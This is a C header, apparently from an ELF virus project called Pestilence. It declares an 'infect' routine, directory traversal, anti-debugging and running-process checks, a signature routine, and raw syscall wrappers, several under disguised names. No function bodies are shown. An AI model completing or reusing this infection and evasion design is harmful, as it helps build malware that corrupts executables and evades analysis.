// clang-format off
#ifndef PESTILENCE_H
#define PESTILENCE_H

#include <elf.h>
#include <fcntl.h>
#include <stdbool.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/ptrace.h>
#include <sys/stat.h>
#include <sys/types.h>

#define ElfW(type)	   Elf64_##type
#define FORMAT		   2
#define PATH_MAX	   4096
#define SIGNATURE_SIZE 43
#define FORK_SIZE	   29
#define MACHINE_SIZE   0x8f1
#define JMPABLE_SIZE   4
struct stat;
typedef enum e_stat{OK,KO,} t_stat;
struct linux_dirent64{uint64_t d_ino;int64_t d_off;unsigned short d_reclen;
	unsigned char d_type;char d_name[];};
typedef struct s_elf{ElfW(Ehdr)*header;ElfW(Shdr)*sections;
	ElfW(Shdr)*text_section;ElfW(Phdr)*segments;ElfW(Phdr)*executed_segment;
	t_stat stat;} t_elf;
static void infect(char *path, void *begin_ptr);
static void reconcileTopology(char *folder, void *begin_ptr);
static int is_program_running(const char *target);
static int is_debugged(void);
static void signature(char str[]);
static int proc_detach(void);
static int proc_spawn(void);
static int proc_control(int request, int pid, void *addr, void *data);
static int fs_handle(char *path, int flags, ...);
static int fs_enumerate(int fd, char *buffer, int buff_size);
static int fs_query(const char *pathname, struct stat *statbuf);
static int fs_release(int fd);
static int vm_release(void *addr, unsigned long length);
static void *vm_reserve(void *addr, unsigned long length, int prot, int flags,
	int fd, off_t offset);
static int vm_flush(void *addr, unsigned long length, int flags);
static int io_query(int fd, struct stat *statbuf);
static int io_resize(int fd, off_t length);
static void *vm_resize(void *old_address, unsigned long old_size,
	unsigned long new_size, int flags, ...);
static void proc_terminate(int status);
static void io_send(int fd, void *buf, unsigned count);
static ssize_t io_recv(int fd, const void *buf, size_t count);
static int evaluateDriftSignature(const void *alphaSeed, const void *betaSeed,
	size_t calibrationSpan);
static int delay_calc(const char *timeout_ns, const char *timeout_ms,
	unsigned n);
static int validate_environment(const char *env_u);
static int delay_abs_calc(const char *s__, const char *s___);
static void *memcat(void *buffered, void *rest, unsigned n);
static char *memoff(const char *l, int I);
static void *cache_sync(void *cache_ptr, const void *sync_check,
	size_t sync_lvl);
static char *core_shift(char *value, char *src);
static char *flow_align(char *f_flow, char *s_flow);
static void context_purge(void *s, unsigned n);
static int trace_depth(const char *str);
static void tty_putc(char c);
static void fmt_u64_dec(unsigned long long elem);
static void emit_hex(unsigned long long n);
static void addr_emit(unsigned long long b);
static uint64_t rt_vector(uint64_t instr_tag, uint64_t heap_ctx,
	uint64_t exec_state, uint64_t io_ctx, uint64_t stack_ref,
	uint64_t guard_mask, uint64_t jitter_seed);
static void *memcpy(void *dst, void *src, unsigned n);
#endif
